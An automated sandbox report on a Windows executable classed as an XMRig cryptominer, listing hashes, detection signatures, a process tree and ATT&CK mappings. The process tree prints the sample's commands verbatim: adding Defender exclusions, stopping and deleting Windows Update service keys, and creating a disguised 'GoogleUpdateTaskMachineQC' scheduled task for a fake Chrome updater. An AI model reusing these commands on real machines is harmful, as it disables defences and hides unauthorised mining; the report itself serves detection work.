Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    22-02-2023 15:04

General

  • Target

    dmi1dfg7n.exe

  • Size

    2.8MB

  • MD5

    9253ed091d81e076a3037e12af3dc871

  • SHA1

    ec02829a25b3bf57ad061bbe54180d0c99c76981

  • SHA256

    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

  • SHA512

    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

  • SSDEEP

    49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
    "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1984
    • C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:472
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1904
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:1176
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1244
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:548
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:1384
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        3⤵
          PID:1640
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
          3⤵
            PID:1868
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            3⤵
            • Modifies security service
            PID:932
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
            3⤵
              PID:1692
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
              3⤵
                PID:1644
            • C:\Windows\system32\cmd.exe
              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:968
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1936
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:944
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1112
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1548
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:572
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                3⤵
                • Creates scheduled task(s)
                PID:760
            • C:\Windows\system32\dialer.exe
              C:\Windows\system32\dialer.exe
              2⤵
              • Drops file in Windows directory
              PID:1476
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1928
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                3⤵
                  PID:1664
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {22AEDB25-F51A-4B98-98B1-939073AE8309} S-1-5-18:NT AUTHORITY\System:Service:
              1⤵
              • Loads dropped DLL
              PID:904
              • C:\Program Files\Google\Chrome\updater.exe
                "C:\Program Files\Google\Chrome\updater.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Drops file in Program Files directory
                • Suspicious use of AdjustPrivilegeToken
                PID:1424
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                  3⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1488
                • C:\Windows\system32\cmd.exe
                  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  3⤵
                    PID:376
                    • C:\Windows\system32\sc.exe
                      sc stop UsoSvc
                      4⤵
                      • Launches sc.exe
                      PID:1936
                    • C:\Windows\system32\sc.exe
                      sc stop WaaSMedicSvc
                      4⤵
                      • Launches sc.exe
                      PID:1112
                    • C:\Windows\system32\sc.exe
                      sc stop wuauserv
                      4⤵
                      • Launches sc.exe
                      PID:1448
                    • C:\Windows\system32\sc.exe
                      sc stop bits
                      4⤵
                      • Launches sc.exe
                      PID:616
                    • C:\Windows\system32\sc.exe
                      sc stop dosvc
                      4⤵
                      • Launches sc.exe
                      PID:856
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      4⤵
                        PID:1336
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        4⤵
                          PID:1644
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                          4⤵
                            PID:676
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                            4⤵
                              PID:760
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              4⤵
                                PID:820
                            • C:\Windows\system32\cmd.exe
                              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              3⤵
                                PID:524
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-ac 0
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1996
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-dc 0
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1748
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-ac 0
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1204
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-dc 0
                                  4⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1360
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                3⤵
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:844
                                • C:\Windows\system32\schtasks.exe
                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:1868
                              • C:\Windows\system32\dialer.exe
                                C:\Windows\system32\dialer.exe xtrjicqmdliu
                                3⤵
                                  PID:1188
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                    4⤵
                                    • Drops file in Program Files directory
                                    PID:1572
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                                      5⤵
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:472
                                • C:\Windows\system32\cmd.exe
                                  cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                  3⤵
                                  • Drops file in Program Files directory
                                  PID:1924
                                • C:\Windows\system32\dialer.exe
                                  C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:564

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Execution

                            Scheduled Task

                            1
                            T1053

                            Persistence

                            Modify Existing Service

                            2
                            T1031

                            Scheduled Task

                            1
                            T1053

                            Privilege Escalation

                            Scheduled Task

                            1
                            T1053

                            Defense Evasion

                            Modify Registry

                            1
                            T1112

                            Impair Defenses

                            1
                            T1562

                            Discovery

                            Query Registry

                            1
                            T1012

                            Impact

                            Service Stop

                            1
                            T1489

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Program Files\Google\Chrome\updater.exe
                              Filesize

                              2.8MB

                              MD5

                              eb27bb8cfa99d659e4fe023e9002ecd1

                              SHA1

                              c783400302fdfae0518269c5a5a8d4bad29f42a3

                              SHA256

                              9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                              SHA512

                              ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                            • C:\Program Files\Google\Chrome\updater.exe
                              Filesize

                              2.8MB

                              MD5

                              eb27bb8cfa99d659e4fe023e9002ecd1

                              SHA1

                              c783400302fdfae0518269c5a5a8d4bad29f42a3

                              SHA256

                              9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                              SHA512

                              ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                            • C:\Program Files\Google\Libs\g.log
                              Filesize

                              198B

                              MD5

                              37dd19b2be4fa7635ad6a2f3238c4af1

                              SHA1

                              e5b2c034636b434faee84e82e3bce3a3d3561943

                              SHA256

                              8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

                              SHA512

                              86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              Filesize

                              7KB

                              MD5

                              c51a9e4a5121bd3e9fea8644c4aaa465

                              SHA1

                              c1b8a00f8108df2e99c857a3b5bc5023b0731771

                              SHA256

                              a6e9e6c135d036bb261b8bb3c78bf0f1866307fc3ac6e2abdb93e5f811737df4

                              SHA512

                              b83a9bd96e4db510ddde3b103f00c5e71f448a6a24c6cacca9863dd860bc24b763098c79a78ffd39561ed70f67a4ee00318ef8e00cb66e882392fa902ec2af89

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              Filesize

                              7KB

                              MD5

                              c51a9e4a5121bd3e9fea8644c4aaa465

                              SHA1

                              c1b8a00f8108df2e99c857a3b5bc5023b0731771

                              SHA256

                              a6e9e6c135d036bb261b8bb3c78bf0f1866307fc3ac6e2abdb93e5f811737df4

                              SHA512

                              b83a9bd96e4db510ddde3b103f00c5e71f448a6a24c6cacca9863dd860bc24b763098c79a78ffd39561ed70f67a4ee00318ef8e00cb66e882392fa902ec2af89

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FED2BGVD6GEOF40WA3U0.temp
                              Filesize

                              7KB

                              MD5

                              c51a9e4a5121bd3e9fea8644c4aaa465

                              SHA1

                              c1b8a00f8108df2e99c857a3b5bc5023b0731771

                              SHA256

                              a6e9e6c135d036bb261b8bb3c78bf0f1866307fc3ac6e2abdb93e5f811737df4

                              SHA512

                              b83a9bd96e4db510ddde3b103f00c5e71f448a6a24c6cacca9863dd860bc24b763098c79a78ffd39561ed70f67a4ee00318ef8e00cb66e882392fa902ec2af89

                            • \??\PIPE\srvsvc
                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                            • \Program Files\Google\Chrome\updater.exe
                              Filesize

                              2.8MB

                              MD5

                              eb27bb8cfa99d659e4fe023e9002ecd1

                              SHA1

                              c783400302fdfae0518269c5a5a8d4bad29f42a3

                              SHA256

                              9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                              SHA512

                              ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                            • memory/564-118-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-122-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-138-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-111-0x00000000003F0000-0x0000000000410000-memory.dmp
                              Filesize

                              128KB

                            • memory/564-110-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-109-0x0000000000370000-0x0000000000390000-memory.dmp
                              Filesize

                              128KB

                            • memory/564-128-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-116-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-130-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-126-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-124-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-136-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-132-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-134-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-120-0x0000000140000000-0x00000001407F4000-memory.dmp
                              Filesize

                              8.0MB

                            • memory/564-119-0x00000000003F0000-0x0000000000410000-memory.dmp
                              Filesize

                              128KB

                            • memory/572-70-0x00000000023E0000-0x00000000023E8000-memory.dmp
                              Filesize

                              32KB

                            • memory/572-69-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
                              Filesize

                              2.9MB

                            • memory/572-74-0x0000000002890000-0x0000000002910000-memory.dmp
                              Filesize

                              512KB

                            • memory/572-73-0x0000000002890000-0x0000000002910000-memory.dmp
                              Filesize

                              512KB

                            • memory/572-72-0x0000000002890000-0x0000000002910000-memory.dmp
                              Filesize

                              512KB

                            • memory/572-71-0x0000000002890000-0x0000000002910000-memory.dmp
                              Filesize

                              512KB

                            • memory/844-103-0x0000000001314000-0x0000000001317000-memory.dmp
                              Filesize

                              12KB

                            • memory/844-104-0x000000000131B000-0x0000000001352000-memory.dmp
                              Filesize

                              220KB

                            • memory/1188-115-0x0000000140000000-0x0000000140049000-memory.dmp
                              Filesize

                              292KB

                            • memory/1424-108-0x000000013FC60000-0x000000013FF28000-memory.dmp
                              Filesize

                              2.8MB

                            • memory/1424-100-0x000000013FC60000-0x000000013FF28000-memory.dmp
                              Filesize

                              2.8MB

                            • memory/1476-94-0x0000000140000000-0x0000000140056000-memory.dmp
                              Filesize

                              344KB

                            • memory/1488-102-0x0000000000F4B000-0x0000000000F82000-memory.dmp
                              Filesize

                              220KB

                            • memory/1488-101-0x0000000000F44000-0x0000000000F47000-memory.dmp
                              Filesize

                              12KB

                            • memory/1928-95-0x0000000002AF4000-0x0000000002AF7000-memory.dmp
                              Filesize

                              12KB

                            • memory/1928-96-0x0000000002AFB000-0x0000000002B32000-memory.dmp
                              Filesize

                              220KB

                            • memory/1984-63-0x000000000296B000-0x00000000029A2000-memory.dmp
                              Filesize

                              220KB

                            • memory/1984-62-0x0000000002964000-0x0000000002967000-memory.dmp
                              Filesize

                              12KB

                            • memory/1984-61-0x0000000002410000-0x0000000002418000-memory.dmp
                              Filesize

                              32KB

                            • memory/1984-60-0x000000001B1C0000-0x000000001B4A2000-memory.dmp
                              Filesize

                              2.9MB

                            • memory/1984-59-0x0000000002960000-0x00000000029E0000-memory.dmp
                              Filesize

                              512KB

                            • memory/2012-54-0x000000013F620000-0x000000013F8E8000-memory.dmp
                              Filesize

                              2.8MB

                            • memory/2012-77-0x000000013F620000-0x000000013F8E8000-memory.dmp
                              Filesize

                              2.8MB